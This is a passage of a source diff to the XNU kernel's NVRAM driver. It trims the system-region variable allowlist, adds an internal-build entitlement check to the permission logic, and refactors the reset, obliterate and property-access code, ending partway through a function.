UInt32 offset; UInt32 size; OSSharedPtr &dict; @@ -147,130 +164,29 @@ UUID_DEFINE(gAppleSystemVariableGuid, 0x40, 0xA0, 0xDD, 0xD2, 0x77, 0xF8, 0x43, UUID_DEFINE(gAppleNVRAMGuid, 0x7C, 0x43, 
0x61, 0x10, 0xAB, 0x2A, 0x4B, 0xBB, 0xA8, 0x80, 0xFE, 0x41, 0x99, 0x5C, 0x9F, 0x82); static bool gNVRAMLogging = false; +static bool gInternalBuild = false; // allowlist variables from macboot that need to be set/get from system region if present static const char * const gNVRAMSystemList[] = { - "adbe-tunable", - "adbe-tunables", - "adfe-tunables", - "alamo-path", - "alt-boot-volume", - "ASMB", - "atc0", - "atc1", + "allow-root-hash-mismatch", "auto-boot", "auto-boot-halt-stage", - "auto-boot-once", - "auto-boot-usb", - "auxkc-path", - "backlight-level", - "backlight-nits", "base-system-path", "boot-args", - "boot-breadcrumbs", "boot-command", - "boot-device", "boot-image", - "boot-partition", - "boot-path", - "boot-ramdisk", - "boot-script", - "boot-volume", "bootdelay", - "bt1addr", - "btaddr", - "cam-use-ext-ldo", - "CLCG_override", "com.apple.System.boot-nonce", - "com.apple.System.rtc-offset", - "com.apple.System.tz0-size", - "core-bin-offset", - "cpu-bin-offset", "darkboot", - "DClr_override", - "dcp-auto-boot", - "debug-gg", - "debug-soc", - "debug-uarts", - "diags-path", - "disable-boot-wdt", - "display-color-space", - "display-timing", - "display-vsh-comp", - "dpcd-max-brightness", - "dtdump", - "dtdump-path", - "e75", "emu", - "enable-auth-debug", - "enable-jop", - "enable-marconi", - "enable-upgrade-fallback", - "enforce-iuob", - "eth1addr", - "ethaddr", - "failboot-breadcrumbs", - "fixed-lcm-boost", - "force-ctrr-lock", - "force-upgrade-fail", - "fuos-path", - "hib-ui-force", - "hibhack-test-hmac", - "iboot-data", - "iboot-failure-reason", - "iboot-failure-reason-str", - "iboot-failure-volume", - "iboot1-precommitted", - "idle-off", - "is-tethered", - "kaslr-off", - "kaslr-slide", - "kis-rsm", - "knobs", - "loadaddr", - "memmapdump", - "mipi-bridge-cmd-verify", - "mipi-bridge-poll-cmd-fifo", - "no-ctrr", - "one-time-boot-command", - "osenvironment", - "ota-breadcrumbs", - "ota-outcome", - "panicmedic", - "panicmedic-threshold", - 
"panicmedic-timestamps", - "phleet-path", - "pinot-panel-id", - "pintoaddr", + "one-time-boot-command", // Needed for diags customer install flows "policy-nonce-digests", - "preserve-debuggability", "prevent-restores", // Keep for factory "prev-lang:kbd", - "ramrod-kickstart-aces", - "rbdaddr0", - "rbm-path", - "reconfig-behavior", - "reconfig-breakpoints", - "recovery-boot-mode", - "recovery-breadcrumbs", - "restored-host-timeout", "root-live-fs", - "rtos-path", - "soc-bin-offset", - "StartupMute", - "StartupMuteAccessibility", - "storage-prev-assert", - "storage-prev-assert-stored", - "summit-panel-id", "SystemAudioVolume", "SystemAudioVolumeExtension", "SystemAudioVolumeSaved", - "tz0-size-override", - "upgrade-fallback-boot-command", - "upgrade-retry", - "usb-enabled", - "wifi1addr", - "wifiaddr", nullptr }; @@ -361,7 +277,7 @@ VariablePermissionEntry gVariablePermissions[] = { .p.Bits.NeverAllowedToDelete = 1}, {"boot-image", .p.Bits.UserWrite = 1}, {"com.apple.System.fp-state", .p.Bits.KernelOnly = 1}, - {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1}, + {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1}, // Deleting this via user triggered obliterate leave J273a unable to boot {"security-password", .p.Bits.RootRequired = 1}, #if !defined(__x86_64__) @@ -369,6 +285,7 @@ VariablePermissionEntry gVariablePermissions[] = { {"acc-cm-override-count", .p.Bits.KernelOnly = 1}, {"acc-mb-ld-lifetime", .p.Bits.KernelOnly = 1}, {"backlight-level", .p.Bits.UserWrite = 1}, + {"backlight-nits", .p.Bits.UserWrite = 1}, {"com.apple.System.boot-nonce", .p.Bits.KernelOnly = 1}, {"com.apple.System.sep.art", .p.Bits.KernelOnly = 1}, {"darkboot", .p.Bits.UserWrite = 1}, @@ -445,11 +362,33 @@ verifyWriteSizeLimit(const uuid_t *varGuid, const char *variableName, size_t pro return true; } +#if defined(DEBUG) || defined(DEVELOPMENT) +static const char * +getNVRAMOpString(IONVRAMOperation op) +{ + switch (op) { + case kIONVRAMOperationRead: + return "Read"; + case 
kIONVRAMOperationWrite: + return "Write"; + case kIONVRAMOperationDelete: + return "Delete"; + case kIONVRAMOperationObliterate: + return "Obliterate"; + case kIONVRAMOperationReset: + return "Reset"; + default: + return "Unknown"; + } +} +#endif + static bool verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName) { VariablePermission perm; - bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled; + bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled, systemInternalEntitled, systemAllow; + bool ok = false; perm = getVariablePermission(varName); @@ -457,20 +396,24 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName if (perm.Bits.KernelOnly) { DEBUG_INFO("KernelOnly access for %s, kernel=%d\n", varName, kernel); - return kernel; + ok = kernel; + goto exit; } - allowList = variableInAllowList(varName); - systemGuid = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0; - admin = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess; - writeEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey); - readEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey); - systemEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey) || kernel; + allowList = variableInAllowList(varName); + systemGuid = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0; + admin = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess; + writeEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey); + readEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey); + systemEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey); + systemInternalEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemInternalAllowKey); + + systemAllow = systemEntitled || (systemInternalEntitled && gInternalBuild) || kernel; 
switch (op) { case kIONVRAMOperationRead: if (kernel || admin || readEntitled || perm.Bits.FullAccess) { - return true; + ok = true; } break; @@ -478,15 +421,15 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName if (kernel || perm.Bits.UserWrite || admin || writeEntitled) { if (systemGuid) { if (allowList) { - if (!systemEntitled) { + if (!systemAllow) { DEBUG_ERROR("Allowed write to system region when NOT entitled for %s\n", varName); } - } else if (!systemEntitled) { + } else if (!systemAllow) { DEBUG_ERROR("Not entitled for system region writes for %s\n", varName); break; } } - return true; + ok = true; } break; @@ -499,27 +442,31 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName } else if ((op == kIONVRAMOperationObliterate) && perm.Bits.ResetNVRAMOnlyDelete) { DEBUG_INFO("Not allowed to obliterate %s\n", varName); break; + } else if ((op == kIONVRAMOperationDelete) && perm.Bits.ResetNVRAMOnlyDelete) { + DEBUG_INFO("Only allowed to delete %s via NVRAM reset\n", varName); + break; } if (kernel || perm.Bits.UserWrite || admin || writeEntitled) { if (systemGuid) { if (allowList) { - if (!systemEntitled) { + if (!systemAllow) { DEBUG_ERROR("Allowed delete to system region when NOT entitled for %s\n", varName); } - } else if (!systemEntitled) { + } else if (!systemAllow) { DEBUG_ERROR("Not entitled for system region deletes for %s\n", varName); break; } } - return true; + ok = true; } break; } - DEBUG_INFO("Permission for %s denied, kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d\n", - varName, kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled); - return false; +exit: + DEBUG_INFO("Permission for %s of %s %s: kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d, systemInternalEntitled=%d, UserWrite=%d\n", + getNVRAMOpString(op), varName, ok ? 
"granted" : "denied", kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled, systemInternalEntitled, perm.Bits.UserWrite); + return ok; } static bool @@ -540,7 +487,7 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult) { uuid_string_t temp = {0}; size_t keyLen = strlen(key); - bool result = false; + bool ok = false; const char *name = key; uuid_t guid; @@ -551,12 +498,12 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult) if ((uuid_parse(temp, guid) == 0) && (key[sizeof(temp) - 1] == ':')) { name = key + sizeof(temp); - result = true; + ok = true; } } if (guidResult) { - result ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid); + ok ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid); } if (nameResult) { *nameResult = name; @@ -565,6 +512,19 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult) return false; } +static bool +skipKey(const OSSymbol *aKey) +{ + return aKey->isEqualTo(kIOClassNameOverrideKey) || + aKey->isEqualTo(kIOBSDNameKey) || + aKey->isEqualTo(kIOBSDNamesKey) || + aKey->isEqualTo(kIOBSDMajorKey) || + aKey->isEqualTo(kIOBSDMinorKey) || + aKey->isEqualTo(kIOBSDUnitKey); +} + +// ************************** IODTNVRAMVariables **************************** + // private IOService based class for publishing distinct dictionary properties on // for easy ioreg access since the serializeProperties call is overloaded and is used // as variable access @@ -573,14 +533,20 @@ class IODTNVRAMVariables : public IOService OSDeclareDefaultStructors(IODTNVRAMVariables) private: IODTNVRAM *_provider; - OSDictionary *_properties; + OSDictionary *_variables; uuid_t _guid; public: - bool init(const uuid_t *guid); - virtual bool start(IOService * provider) APPLE_KEXT_OVERRIDE; - virtual IOReturn setProperties(OSObject * properties) APPLE_KEXT_OVERRIDE; - virtual bool serializeProperties(OSSerialize *s) const 
APPLE_KEXT_OVERRIDE; + bool init(const uuid_t *guid); + virtual bool start(IOService * provider) APPLE_KEXT_OVERRIDE; + virtual IOReturn setVariables(OSObject * properties); + + virtual bool serializeProperties(OSSerialize *s) const APPLE_KEXT_OVERRIDE; + virtual OSPtr copyProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE; + virtual OSObject *getProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE; + virtual bool setProperty(const OSSymbol *aKey, OSObject *anObject) APPLE_KEXT_OVERRIDE; + virtual IOReturn setProperties(OSObject *properties) APPLE_KEXT_OVERRIDE; + virtual void removeProperty(const OSSymbol *aKey) APPLE_KEXT_OVERRIDE; }; OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService) @@ -588,23 +554,30 @@ OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService) bool IODTNVRAMVariables::init(const uuid_t *guid) { - require(super::init(), error); - require(guid, error); + if (!super::init()) { + return false; + } + + if (guid == nullptr) { + return false; + } uuid_copy(_guid, *guid); return true; - -error: - return false; } bool IODTNVRAMVariables::start(IOService * provider) { - require(IOService::start(provider), error); + if (!IOService::start(provider)) { + goto error; + } - require(_provider = OSDynamicCast(IODTNVRAM, provider), error); + _provider = OSDynamicCast(IODTNVRAM, provider); + if (_provider == nullptr) { + goto error; + } registerService(); @@ -617,15 +590,15 @@ error: } IOReturn -IODTNVRAMVariables::setProperties(OSObject * properties) +IODTNVRAMVariables::setVariables(OSObject * variables) { - if (OSDynamicCast(OSDictionary, properties)) { - OSSafeReleaseNULL(_properties); - _properties = OSDynamicCast(OSDictionary, properties); - properties->retain(); + if (OSDynamicCast(OSDictionary, variables)) { + OSSafeReleaseNULL(_variables); + _variables = OSDynamicCast(OSDictionary, variables); + variables->retain(); } - return IOService::setProperties(properties); + return kIOReturnSuccess; } bool @@ -634,30 +607,123 @@ 
IODTNVRAMVariables::serializeProperties(OSSerialize *s) const const OSSymbol *key; OSSharedPtr dict; OSSharedPtr iter; - OSSharedPtr localProperties(_properties, OSRetain); - bool result = false; + OSSharedPtr localVariables(_variables, OSRetain); + bool ok = false; - require(localProperties != nullptr, exit); + if (localVariables == nullptr) { + goto exit; + } - dict = OSDictionary::withCapacity(localProperties->getCount()); - require_action(dict, exit, DEBUG_ERROR("No dictionary\n")); + dict = OSDictionary::withCapacity(localVariables->getCount()); + if (dict == nullptr) { + DEBUG_ERROR("No dictionary\n"); + goto exit; + } - iter = OSCollectionIterator::withCollection(localProperties.get()); - require_action(iter, exit, DEBUG_ERROR("failed to create iterator\n")); + iter = OSCollectionIterator::withCollection(localVariables.get()); + if (iter == nullptr) { + DEBUG_ERROR("failed to create iterator\n"); + goto exit; + } while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { if (verifyPermission(kIONVRAMOperationRead, &_guid, key)) { - dict->setObject(key, localProperties->getObject(key)); + dict->setObject(key, localVariables->getObject(key)); } } - result = dict->serialize(s); + ok = dict->serialize(s); exit: - DEBUG_INFO("result=%d\n", result); - return result; + DEBUG_INFO("ok=%d\n", ok); + return ok; +} + +OSPtr +IODTNVRAMVariables::copyProperty(const OSSymbol *aKey) const +{ + if (_provider && !skipKey(aKey)) { + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + return _provider->copyPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy()); + } else { + return nullptr; + } } +OSObject * +IODTNVRAMVariables::getProperty(const OSSymbol *aKey) const +{ + OSSharedPtr theObject = copyProperty(aKey); + + return theObject.get(); +} + +bool +IODTNVRAMVariables::setProperty(const OSSymbol *aKey, OSObject *anObject) +{ + if (_provider) { + return _provider->setPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy(), anObject); + } else { + return false; 
+ } +} + +IOReturn +IODTNVRAMVariables::setProperties(OSObject *properties) +{ + IOReturn ret = kIOReturnSuccess; + OSObject *object; + const OSSymbol *key; + OSDictionary *dict; + OSSharedPtr iter; + + if (_provider) { + dict = OSDynamicCast(OSDictionary, properties); + if (dict == nullptr) { + DEBUG_ERROR("Not a dictionary\n"); + return kIOReturnBadArgument; + } + + iter = OSCollectionIterator::withCollection(dict); + if (iter == nullptr) { + DEBUG_ERROR("Couldn't create iterator\n"); + return kIOReturnBadArgument; + } + + while (ret == kIOReturnSuccess) { + key = OSDynamicCast(OSSymbol, iter->getNextObject()); + if (key == nullptr) { + break; + } + + object = dict->getObject(key); + if (object == nullptr) { + continue; + } + + ret = setProperty(key, object); + } + } else { + ret = kIOReturnNotReady; + } + + DEBUG_INFO("ret=%#08x\n", ret); + + return ret; +} + +void +IODTNVRAMVariables::removeProperty(const OSSymbol *aKey) +{ + if (_provider) { + _provider->removePropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy()); + } +} + + +// **************************** IODTNVRAM ********************************* + bool IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane) { @@ -667,7 +733,17 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane) return false; } - _variableLock = IOLockAlloc(); + PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging)); + +#if XNU_TARGET_OS_OSX +#if CONFIG_CSR + gInternalBuild = (csr_check(CSR_ALLOW_APPLE_INTERNAL) == 0); +#endif // CONFIG_CSR +#endif // XNU_TARGET_OS_OSX + + DEBUG_INFO("gInternalBuild = %d\n", gInternalBuild); + + _variableLock = IORWLockAlloc(); if (!_variableLock) { return false; } @@ -677,8 +753,6 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane) return false; } - PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging)); - dict = OSDictionary::withCapacity(1); if (dict == nullptr) { return false; @@ -789,12 +863,14 @@ 
IODTNVRAM::registerNVRAMController(IONVRAMController *nvram) DEBUG_INFO("setting controller\n"); + CONTROLLERLOCK(); _nvramController = nvram; + CONTROLLERUNLOCK(); // race condition possible between // IODTNVRAM and IONVRAMController (restore loses boot-args) if (!_isProxied) { - DEBUG_INFO("Proxied NVRAM data\n"); + DEBUG_INFO("Reading non-proxied NVRAM data\n"); _nvramController->read(0, _nvramImage, _nvramSize); initNVRAMImage(); } @@ -850,7 +926,7 @@ no_system: no_common: ret = serializeVariables(); - DEBUG_INFO("serializeVariables ret=0x%08x\n", ret); + DEBUG_INFO("serializeVariables ret=%#08x\n", ret); } void @@ -867,8 +943,11 @@ IODTNVRAM::initNVRAMImage(void) while (currentOffset < _nvramSize) { bool common_partition; bool system_partition; - chrp_nvram_header_t * header = (chrp_nvram_header_t *)(_nvramImage + currentOffset); + const uint8_t common_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V1}; + const uint8_t common_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V2}; + const uint8_t system_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1}; + const uint8_t system_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2}; currentLength = header->len * NVRAM_CHRP_LENGTH_BLOCK_SIZE; @@ -883,9 +962,10 @@ IODTNVRAM::initNVRAMImage(void) break; } - common_partition = memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0; - system_partition = (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) || - (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY)) == 0); + common_partition = (memcmp(header->name, common_v1_name, sizeof(header->name)) == 0) || + (memcmp(header->name, common_v2_name, sizeof(header->name)) == 0); + system_partition = (memcmp(header->name, system_v1_name, sizeof(header->name)) == 0) || + (memcmp(header->name, 
system_v2_name, sizeof(header->name)) == 0); if (common_partition) { _commonPartitionOffset = partitionOffset; @@ -897,8 +977,8 @@ IODTNVRAM::initNVRAMImage(void) OSSharedPtr partitionOffsetNumber, partitionLengthNumber; // Construct the partition ID from the signature and name. - snprintf(partitionID, sizeof(partitionID), "0x%02x,", header->sig); - strncpy(partitionID + 5, header->name, sizeof(header->name)); + snprintf(partitionID, sizeof(partitionID), "%#02x,", header->sig); + memcpy(partitionID + 5, header->name, sizeof(header->name)); partitionID[17] = '\0'; partitionOffsetNumber = OSNumber::withNumber(partitionOffset, 32); @@ -919,7 +999,7 @@ IODTNVRAM::initNVRAMImage(void) _systemImage = _nvramImage + _systemPartitionOffset; } - DEBUG_ALWAYS("NVRAM : ofPartitionOffset - 0x%x, ofPartitionSize - 0x%x, systemPartitionOffset - 0x%x, systemPartitionSize - 0x%x\n", + DEBUG_ALWAYS("NVRAM : commonPartitionOffset - %#x, commonPartitionSize - %#x, systemPartitionOffset - %#x, systemPartitionSize - %#x\n", (unsigned int) _commonPartitionOffset, (unsigned int) _commonPartitionSize, (unsigned int) _systemPartitionOffset, (unsigned int) _systemPartitionSize); _lastDeviceSync = 0; @@ -963,10 +1043,10 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const const OSSymbol *key; OSSharedPtr systemDict, commonDict, dict; OSSharedPtr iter; - bool result = false; + bool ok = false; unsigned int totalCapacity = 0; - NVRAMLOCK(); + NVRAMREADLOCK(); if (_commonDict) { commonDict = OSDictionary::withDictionary(_commonDict.get()); } @@ -1021,12 +1101,12 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const } } - result = dict->serialize(s); + ok = dict->serialize(s); exit: - DEBUG_INFO("result=%d\n", result); + DEBUG_INFO("ok=%d\n", ok); - return result; + return ok; } IOReturn @@ -1048,89 +1128,89 @@ IODTNVRAM::chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid, c DEBUG_INFO("Using common dictionary\n"); *dict = _commonDict.get(); } - } else { + return 
kIOReturnSuccess; + } else if (_commonDict != nullptr) { DEBUG_INFO("Defaulting to common dictionary\n"); *dict = _commonDict.get(); + return kIOReturnSuccess; } - return kIOReturnSuccess; + return kIOReturnNotFound; } -bool -IODTNVRAM::handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error) +IOReturn +IODTNVRAM::flushDict(const uuid_t *guid, IONVRAMOperation op) { IOReturn err = kIOReturnSuccess; - bool special = false; - NVRAMLOCKASSERT(); + if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) { + const OSSymbol *key; + OSSharedPtr newDict; + OSSharedPtr iter; - if (strcmp(name, "ResetNVRam") == 0) { - DEBUG_INFO("%s requested\n", name); + newDict = OSDictionary::withCapacity(_systemDict->getCapacity()); + iter = OSCollectionIterator::withCollection(_systemDict.get()); + if ((newDict == nullptr) || (iter == nullptr)) { + err = kIOReturnNoMemory; + goto exit; + } - if (uuid_compare(*guid, gAppleSystemVariableGuid) == 0) { - if (_systemDict != nullptr) { - _systemDict->flushCollection(); + while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { + if (!verifyPermission(op, &gAppleSystemVariableGuid, key)) { + newDict->setObject(key, _systemDict->getObject(key)); } - - _commonDict->flushCollection(); - DEBUG_INFO("system & common dictionary flushed\n"); } - special = true; - } else if (strcmp(name, "ObliterateNVRam") == 0) { - DEBUG_INFO("%s requested\n", name); + _systemDict = newDict; - if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) { - const OSSymbol *key; - OSSharedPtr newDict; - OSSharedPtr iter; + DEBUG_INFO("system dictionary flushed\n"); + } else if ((_commonDict != nullptr) && (uuid_compare(*guid, gAppleNVRAMGuid) == 0)) { + const OSSymbol *key; + OSSharedPtr newDict; + OSSharedPtr iter; - newDict = OSDictionary::withCapacity(_systemDict->getCapacity()); - iter = OSCollectionIterator::withCollection(newDict.get()); - if ((newDict == nullptr) || 
(iter == nullptr)) { - err = kIOReturnNoMemory; - goto exit; - } - - while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { - const OSSymbol *key = OSDynamicCast(OSSymbol, iter->getNextObject()); - if (key == nullptr) { - err = kIOReturnNoMemory; - goto exit; - } + newDict = OSDictionary::withCapacity(_commonDict->getCapacity()); + iter = OSCollectionIterator::withCollection(_commonDict.get()); + if ((newDict == nullptr) || (iter == nullptr)) { + err = kIOReturnNoMemory; + goto exit; + } - if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleSystemVariableGuid, key)) { - newDict->setObject(key, _systemDict->getObject(key)); - } + while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { + if (!verifyPermission(op, &gAppleNVRAMGuid, key)) { + newDict->setObject(key, _commonDict->getObject(key)); } + } - _systemDict = newDict; + _commonDict = newDict; - DEBUG_INFO("system dictionary flushed\n"); - } else if (_commonDict != nullptr) { - const OSSymbol *key; - OSSharedPtr newDict; - OSSharedPtr iter; + DEBUG_INFO("common dictionary flushed\n"); + } - newDict = OSDictionary::withCapacity(_commonDict->getCapacity()); - iter = OSCollectionIterator::withCollection(newDict.get()); - if ((newDict == nullptr) || (iter == nullptr)) { - err = kIOReturnNoMemory; - goto exit; - } +exit: + return err; +} - while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { - if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleNVRAMGuid, key)) { - newDict->setObject(key, _commonDict->getObject(key)); - } - } +bool +IODTNVRAM::handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error) +{ + IOReturn err = kIOReturnSuccess; + bool special = false; - _commonDict = newDict; + NVRAMLOCKASSERTEXCLUSIVE(); - DEBUG_INFO("common dictionary flushed\n"); + // ResetNVRam flushes both regions in one call + // Obliterate can flush either separately + if (strcmp(name, "ObliterateNVRam") == 0) { + err = flushDict(guid, 
kIONVRAMOperationObliterate); + } else if (strcmp(name, "ResetNVRam") == 0) { + err = flushDict(&gAppleSystemVariableGuid, kIONVRAMOperationReset); + + if (err != kIOReturnSuccess) { + goto exit; } - special = true; + err = flushDict(&gAppleNVRAMGuid, kIONVRAMOperationReset); } exit: @@ -1142,39 +1222,25 @@ exit: } OSSharedPtr -IODTNVRAM::copyProperty(const OSSymbol *aKey) const +IODTNVRAM::copyPropertyWithGUIDAndName(const uuid_t *guid, const char *name) const { IOReturn result; - const char *variableName; - uuid_t varGuid; OSDictionary *dict; OSSharedPtr theObject = nullptr; - if (aKey->isEqualTo(kIOBSDNameKey) || - aKey->isEqualTo(kIOBSDNamesKey) || - aKey->isEqualTo(kIOBSDMajorKey) || - aKey->isEqualTo(kIOBSDMinorKey) || - aKey->isEqualTo(kIOBSDUnitKey)) { - // These will never match. - // Check here and exit to avoid logging spam - return nullptr; - } - DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); - - parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); - - result = chooseDictionary(kIONVRAMOperationRead, &varGuid, variableName, &dict); + result = chooseDictionary(kIONVRAMOperationRead, guid, name, &dict); if (result != kIOReturnSuccess) { + DEBUG_INFO("No dictionary\n"); goto exit; } - if (!verifyPermission(kIONVRAMOperationRead, &varGuid, variableName)) { + if (!verifyPermission(kIONVRAMOperationRead, guid, name)) { DEBUG_INFO("Not privileged\n"); goto exit; } - NVRAMLOCK(); - theObject.reset(dict->getObject(variableName), OSRetain); + NVRAMREADLOCK(); + theObject.reset(dict->getObject(name), OSRetain); NVRAMUNLOCK(); if (theObject != nullptr) { @@ -1185,6 +1251,22 @@ exit: return theObject; } +OSSharedPtr +IODTNVRAM::copyProperty(const OSSymbol *aKey) const +{ + const char *variableName; + uuid_t varGuid; + + if (skipKey(aKey)) { + return nullptr; + } + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + + return copyPropertyWithGUIDAndName(&varGuid, 
variableName); +} + OSSharedPtr IODTNVRAM::copyProperty(const char *aKey) const { @@ -1220,64 +1302,64 @@ IODTNVRAM::getProperty(const char *aKey) const } IOReturn -IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) +IODTNVRAM::setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject) { - IOReturn result = kIOReturnSuccess; + IOReturn ret = kIOReturnSuccess; bool remove = false; OSString *tmpString = nullptr; OSSharedPtr propObject, oldObject; OSSharedPtr sharedObject(anObject, OSRetain); - const char *variableName; - uuid_t varGuid; OSDictionary *dict; bool deletePropertyKey, syncNowPropertyKey, forceSyncNowPropertyKey; bool ok; size_t propDataSize = 0; - DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); - - parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); - deletePropertyKey = strncmp(variableName, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0; - syncNowPropertyKey = strncmp(variableName, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0; - forceSyncNowPropertyKey = strncmp(variableName, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0; + deletePropertyKey = strncmp(name, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0; + syncNowPropertyKey = strncmp(name, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0; + forceSyncNowPropertyKey = strncmp(name, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0; if (deletePropertyKey) { tmpString = OSDynamicCast(OSString, anObject); if (tmpString != nullptr) { + const char *variableName; + uuid_t varGuid; + DEBUG_INFO("kIONVRAMDeletePropertyKey found\n"); - OSSharedPtr sharedKey = OSSymbol::withString(tmpString); - removeProperty(sharedKey.get()); + + parseVariableName(tmpString->getCStringNoCopy(), &varGuid, &variableName); + removePropertyWithGUIDAndName(&varGuid, variableName); } else { 
DEBUG_INFO("kIONVRAMDeletePropertyKey value needs to be an OSString\n"); - result = kIOReturnError; + ret = kIOReturnError; } goto exit; } else if (syncNowPropertyKey || forceSyncNowPropertyKey) { tmpString = OSDynamicCast(OSString, anObject); - DEBUG_INFO("NVRAM sync key %s found\n", aKey->getCStringNoCopy()); + DEBUG_INFO("NVRAM sync key %s found\n", name); if (tmpString != nullptr) { // We still want to throttle NVRAM commit rate for SyncNow. ForceSyncNow is provided as a really big hammer. syncInternal(syncNowPropertyKey); } else { - DEBUG_INFO("%s value needs to be an OSString\n", variableName); - result = kIOReturnError; + DEBUG_INFO("%s value needs to be an OSString\n", name); + ret = kIOReturnError; } goto exit; } - result = chooseDictionary(kIONVRAMOperationWrite, &varGuid, variableName, &dict); - if (result != kIOReturnSuccess) { + ret = chooseDictionary(kIONVRAMOperationWrite, guid, name, &dict); + if (ret != kIOReturnSuccess) { + DEBUG_INFO("No dictionary\n"); goto exit; } - if (!verifyPermission(kIONVRAMOperationWrite, &varGuid, variableName)) { + if (!verifyPermission(kIONVRAMOperationWrite, guid, name)) { DEBUG_INFO("Not privileged\n"); - result = kIOReturnNotPrivileged; + ret = kIOReturnNotPrivileged; goto exit; } // Make sure the object is of the correct type. 
